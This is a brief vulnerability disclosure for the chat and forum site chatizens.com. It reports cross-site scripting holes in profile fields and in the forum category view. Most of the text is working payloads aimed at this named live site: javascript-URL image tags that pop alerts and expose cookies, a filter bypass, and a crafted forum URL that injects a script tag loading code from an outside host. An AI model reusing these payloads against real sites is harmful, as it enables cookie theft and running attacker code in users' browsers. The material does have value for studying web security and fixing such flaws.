Chatizens.com Also known as Chattown.com Homepage: http://www.chatizens.com Affected files: * Profile input boxes: All input boxes of your profile. * Browsing the forums -------------------------------------------- XSS vuln with cookie disclosure via profile input boxes. To bypass chatizens filters of adding backslashes to ' and ", we use the long UFT-8 unicode of '. PoC: <img src=javascript:alert('XSS')> And to display our cookie: <IMG SRC=javascript:alert(document.cookie)> Screenshot: http://www.youfucktard.com/xsp/chatizen1.jpg http://www.youfucktard.com/xsp/chatizen2.jpg --------------------------------------------- heh, it seems chatizens.com is using a webapp I auditing before, Alstrasoft E-Friends. Screenshot: http://www.youfucktard.com/xsp/chatizen3.jpg ------------------------------------------- XSS vuln via viewing forum categories: http://chatizens.com/friends/index.php?mode=forums&act=viewcat&seid=19";>">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" Screenshot: http://www.youfucktard.com/xsp/chatizen4.jpg
